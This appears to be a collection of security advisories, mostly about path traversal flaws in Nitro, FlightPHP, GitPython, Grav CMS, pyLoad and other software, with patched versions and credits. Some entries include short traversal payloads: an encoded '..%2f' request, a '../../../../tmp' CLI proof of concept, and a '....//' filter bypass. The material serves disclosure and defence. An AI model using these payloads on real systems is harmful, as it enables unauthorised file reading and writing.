A proxy route rule like: ```ts routeRules: { "/api/orders/**": { proxy: { to: "http://upstream/orders/**" } } } ``` is intended to limit the proxy to URLs under `/api/orders/`. Before the patch, an attacker could bypass that scope by sending percent-encoded path traversal (`..%2f`) in the URL, causing Nitro to forward a request that the upstream resolved outside the configured scope. Example exploit: ``` GET /api/orders/..%2fadmin%2fconfig.json ``` Nitro sees `..%2f` as opaque characters at match time, the `/api/orders/**` rule matched, and the raw path was forwarded to the upstream as `/orders/..%2fadmin/config.json`. An upstream that decodes `%2F` to `/` then resolved `..` and can serve `/admin/config.json` outside the intended scope. ### Are you affected? Users may be affected if **ALL** of the following are true: 1. Their project uses Nitro's `routeRules` with a `proxy` entry (`{ proxy: { to: "..." } }`). 2. The proxy `to` value uses a `/**` wildcard suffix to forward sub-paths. 3. The **upstream** behind the proxy decodes `%2F` as `/` before routing or filesystem lookup. 4. Proxy route rules are _not_ handled natively at CDN (nitro v3 and vercel) Whether the bypass actually leaks data depends on the upstream. Modern JS frameworks keep `%2F` opaque per RFC 3986 and are safe by construction. - **Safe examples:** H3 v2, Express v5, Hono v4 - modern JS frameworks keep `%2F` opaque per RFC 3986. - **Vulnerable examples:** naive imlementations that decodes the URL, static file servers, CGI dispatchers, Python `os.path`-based routing, anything sitting behind another layer that decodes `%2F` (common in microservice meshes). ## Impact Any HTTP path reachable from the Nitro server to the upstream could be requested, regardless of the configured `/**` scope. In typical deployments (API gateway, BFF, microservice proxy) this could expose internal admin endpoints, secrets endpoints, or other services the developer believed the scope rule fenced off. ## Patched versions Upgrade to one of: - [2.13.4](https://github.com/nitrojs/nitro/releases/tag/v2.13.4) or later (https://github.com/nitrojs/nitro/pull/4223) - [3.0.260429-beta](https://github.com/nitrojs/nitro/releases/tag/v3.0.260429-beta) or later (https://github.com/nitrojs/nitro/pull/4222) The fix canonicalizes the incoming pathname before building the upstream URL and rejects requests with `400 Bad Request` if the resolved path would escape the rule's base. The bytes forwarded upstream are unchanged when the request is allowed. > Note: the fix assumes the upstream does not double-decode percent-encoding. If your upstream decodes twice (`%252F → %2F → /`), it remains your responsibility to harden it. **Single-decode is standard**. ## Credits Reported by [@mHe4am](https://github.com/mHe4am) ([@he4am on HackerOne](https://hackerone.com/he4am)) via the [Vercel Open Source](https://hackerone.com/vercel-open-source?type=team) program.
Path traversal in Mako Templates (Python library) on Windows platforms allows attackers to read arbitrary files outside configured template directories via backslash-based directory traversal sequences. Affects Mako versions ≤1.3.11 when applications accept user-controlled template names on Windows systems. Vendor-released patch available in version 1.3.12 (confirmed by GitHub commit 72e10c5). No public exploit code identified at time of analysis, though exploitation conditions are straightforward when prerequisites are met.
FlightPHP Core's default error handler exposes full exception messages, stack traces, and absolute filesystem paths in HTTP 500 responses without any debug-mode gating. All versions before 3.18.1 leak internal application structure, vendor package names, and any secrets interpolated into exception messages to unauthenticated remote attackers. This information disclosure primes follow-on attacks like LFI and path traversal by revealing server paths and configuration file locations. Vendor-released patch in version 3.18.1 introduces a flight.debug setting (default false) that suppresses verbose output in production. CVSS 7.5 reflects network-accessible information disclosure with no privileges required.
### Summary The `make:controller` CLI command calls `mkdir(..., recursive: true)` on a path built from the user-supplied controller name, **before** Nette's class-name validation runs. The class-file write is correctly rejected by Nette when the name contains `/`, but the recursive directory creation side effect is already committed - including directories located outside the project root through `../` traversal. ### Affected code `flight/commands/ControllerCommand.php` (≈ 63-66): ```php if (is_dir(dirname($controllerPath)) === false) { $io->info('Creating directory ' . dirname($controllerPath), true); mkdir(dirname($controllerPath), 0755, true); // un-normalized, runs before validation } ``` ### Proof of concept ``` $ php vendor/flightphp/runway/runway make:controller '../../../../tmp/CONTROLLER_TRAVERSAL_TEST/pwn' Creating directory .../app/controllers/../../../../tmp/CONTROLLER_TRAVERSAL_TEST Nette\InvalidArgumentException: Value '../../../../tmp/CONTROLLER_TRAVERSAL_TEST/pwnController' is not valid class name. $ ls /home/user/tmp/CONTROLLER_TRAVERSAL_TEST (directory exists - created before the exception was thrown) ``` ### Impact - **Arbitrary directory creation outside the project root**, executable by any local actor that can run the Flight CLI (developer machine, shared CI build agent, compromised dev container). - Primes log-file planting for chained LFI exploitation (e.g. creating a directory where an attacker can later drop a `.php` file to be included via a distinct template-include weakness). - On Windows, the `\` separator opens additional traversal surface. ### Patch (fixed in `3.18.1`, commit `b8dd23a`) The controller name is now normalized with `basename()` and validated against `^[A-Za-z_][A-Za-z0-9_]*$` before any `mkdir` side effect runs. ### Credit Discovered by **@Rootingg**.
Hugo static site generator versions 0.43.0 through 0.160.x allow unrestricted file system access when building sites with Node-based asset pipelines (PostCSS, Babel, TailwindCSS), enabling arbitrary code execution through these tools to read or write files outside the project directory. The vulnerability affects only users who deploy Node asset pipelines; those building trusted sites or not using these pipelines are unaffected. A vendor-released patch in v0.161.0 enforces Node's permission model with strict filesystem defaults.
Path traversal vulnerability in Magic Wormhole receive command allows authenticated attackers to write files outside the intended output directory when the specified output directory already exists, enabling arbitrary file write with low complexity via network delivery of a specially crafted transfer request.
Path traversal in GitPython versions ≤3.1.47 enables arbitrary file write and deletion outside repository boundaries when applications pass attacker-controlled reference paths to reference creation, rename, or delete operations. A fully-functional proof-of-concept demonstrates successful exploitation by crafting reference names with '../../../' sequences to escape the `.git` directory and manipulate files with the process owner's permissions. Applications exposing GitPython reference APIs to user input-particularly Git automation services, CI/CD pipelines, and multi-tenant developer platforms-are at immediate risk, as no authentication is required at the library boundary. Fixed in version 3.1.48 per GitHub advisory GHSA-7545-fcxq-7j24.
Path traversal in NanoClaw's container filesystem boundary allows compromised containers or prompt-injected agents to escape isolation and read arbitrary host files via crafted message IDs and attachment paths, with potential for recursive deletion of host directories during outbox cleanup. The vulnerability exploits insufficient validation of outbound attachment filenames and symlink resolution in the host-side message handling code. Upstream fix available (GitHub commit 7814e45) but released patched version not independently confirmed. No public exploit identified at time of analysis, though proof-of-concept test cases demonstrate both file exfiltration and destructive cleanup paths.
Local privilege escalation in ZTE PROCESS Guard Service allows authenticated local users to escalate privileges and achieve arbitrary code execution through improper access control enforcement, affecting the cloud computer client. The vulnerability requires local access and authenticated user context but operates across system boundaries, potentially compromising system integrity. No active exploitation has been confirmed at time of analysis, though the combination of privilege escalation and RCE capability makes this a moderate-priority local threat.
Path traversal vulnerability in Apache Wicket's FolderUploadsFileManager allows unauthenticated attackers to read arbitrary files or write files outside the intended upload directory by exploiting unsanitized uploadFieldId and clientFileName parameters. Affected versions 8.0.0-8.17.0, 9.0.0-9.22.0, and 10.0.0-10.8.0 are vulnerable to remote file access and modification without authentication or user interaction. Vendor-released patch available in version 10.9.0.
Oracle OCI CLI version 3.77 allows local attackers with user interaction to place imported files outside the intended directory, compromising file integrity and enabling potential code execution or data exfiltration. The vulnerability requires local access and user interaction but carries high integrity impact through arbitrary file placement. No active exploitation or public exploit code has been identified at the time of analysis.
Fluent Forms plugin for WordPress up to version 6.2.1 allows authenticated administrators to read arbitrary files readable by the web server through path traversal in the getAttachments() method of EmailNotificationActions. The vulnerability stems from insufficient validation of file-upload URLs in admin notification configurations, permitting attackers to supply traversal sequences like <upload_baseurl>/../../<target> to access sensitive files such as wp-config.php containing database credentials and authentication salts. While unauthenticated users can trigger email notifications, the exploit requires administrator-level access to configure the malicious notification attachment.
Unauthenticated path traversal in Grav CMS FormFlash component allows remote attackers to create arbitrary directories and write configuration files (index.yaml) with controlled content. Confirmed actively exploited (CISA KEV). The vulnerability affects all Grav v1.7.x installations with form-enabled pages (default in standard deployments). Attack complexity is low-requires only manipulating the __form-flash-id POST parameter with traversal sequences. Vendor-released patch available in v2.0.0-beta.2 (commit d904efc33) applies strict alphanumeric sanitization to session identifiers. EPSS exploitation probability data not available, but GitHub advisory confirms zero-day status prior to patch, with public proof-of-concept demonstrating directory creation in user/config/ paths leading to configuration injection and potential DoS via inode exhaustion.
Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.
Absolute path traversal in pyLoad download manager allows authenticated users to write files to arbitrary filesystem locations via unsanitized package folder names in the set_package_data() API function. Users with Perms.MODIFY can redirect downloads to sensitive directories (e.g., /etc, /root, system directories) bypassing intended download directory restrictions, enabling configuration overwrite or denial of service through disk exhaustion. Publicly available exploit code exists with complete proof-of-concept in the GitHub security advisory. CVSS 8.1 (High) reflects high integrity and availability impact limited by low-privilege authentication requirement.
Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces `../` with `_`, but the pattern `....//` bypasses this filter by becoming `.._` after replacement, leaving exploitable `..` sequences that the OS later resolves. CVSS 6.5 (network-accessible, low complexity, requires low-privilege authentication, high integrity impact). Publicly available proof-of-concept code demonstrates exploitation against default credentials.